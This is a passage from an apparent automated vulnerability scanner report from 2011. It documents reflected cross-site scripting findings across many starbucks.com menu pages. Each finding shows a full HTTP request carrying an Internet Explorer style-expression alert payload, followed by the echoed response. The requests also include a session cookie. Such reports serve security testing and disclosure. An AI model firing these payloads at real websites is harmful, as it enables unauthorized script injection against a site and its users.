<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino?76702"style="x:expression(alert(1))"b4ae84575bd=1"/>
...[SNIP]...

2.93. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2267"style="x:expression(alert(1))"213c4c81aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:30 GMT
Connection: close
Content-Length: 39894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style="x:expression(alert(1))"213c4c81aec=1"/>
...[SNIP]...

2.94. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 946db"style%3d"x%3aexpression(alert(1))"31b738e1403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 946db"style="x:expression(alert(1))"31b738e1403 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style%3d"x%3aexpression(alert(1))"31b738e1403=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:33 GMT
Connection: close
Content-Length: 39754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style="x:expression(alert(1))"31b738e1403=1"/>
...[SNIP]...

2.95. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a9dc"style="x:expression(alert(1))"2308b961066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:11 GMT
Connection: close
Content-Length: 39974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style="x:expression(alert(1))"2308b961066=1"/>
...[SNIP]...

2.96. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3544d"style="x:expression(alert(1))"5aba95253f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:09 GMT
Connection: close
Content-Length: 39870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style="x:expression(alert(1))"5aba95253f2=1"/>
...[SNIP]...

2.97. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/bold-pick-of-the-day

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97603"style="x:expression(alert(1))"ccda16a9e2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:30 GMT
Connection: close
Content-Length: 41233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style="x:expression(alert(1))"ccda16a9e2a=1"/>
...[SNIP]...

2.98. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/cafe-misto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84eea"style="x:expression(alert(1))"3de17d6a195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/cafe-misto?84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:02 GMT
Connection: close
Content-Length: 41226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto?84eea"style="x:expression(alert(1))"3de17d6a195=1"/>
...[SNIP]...

2.99. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/clover-brewed-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b665"style="x:expression(alert(1))"b850b32aa93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:33 GMT
Connection: close
Content-Length: 40818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style="x:expression(alert(1))"b850b32aa93=1"/>
...[SNIP]...

2.100. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/coffee-traveler

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea54a"style="x:expression(alert(1))"a6d99dcddd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/coffee-traveler?ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:39 GMT
Connection: close
Content-Length: 39163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler?ea54a"style="x:expression(alert(1))"a6d99dcddd8=1"/>
...[SNIP]...

2.101. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/decaf-pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75a68"style="x:expression(alert(1))"76d19496ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:44 GMT
Connection: close
Content-Length: 41017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style="x:expression(alert(1))"76d19496ed1=1"/>
...[SNIP]...

2.102. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/iced-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfea6"style="x:expression(alert(1))"8ec24fe6e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/iced-coffee?dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:44 GMT
Connection: close
Content-Length: 41110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee?dfea6"style="x:expression(alert(1))"8ec24fe6e3=1"/>
...[SNIP]...

2.103. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/pikes-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 127b0"style="x:expression(alert(1))"1a2f3296cc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/pikes-place-roast?127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:19 GMT
Connection: close
Content-Length: 40828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast?127b0"style="x:expression(alert(1))"1a2f3296cc8=1"/>
...[SNIP]...

2.104. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e53d6"style="x:expression(alert(1))"103b6e338a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/chocolate/hot-chocolate?e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:52 GMT
Connection: close
Content-Length: 41071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate?e53d6"style="x:expression(alert(1))"103b6e338a0=1"/>
...[SNIP]...

2.105. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/peppermint-mocha-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 601a4"style="x:expression(alert(1))"868c1ee823c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:26 GMT
Connection: close
Content-Length: 41286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style="x:expression(alert(1))"868c1ee823c=1"/>
...[SNIP]...

2.106. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/salted-caramel-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d695f"style="x:expression(alert(1))"8d2325f8a6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
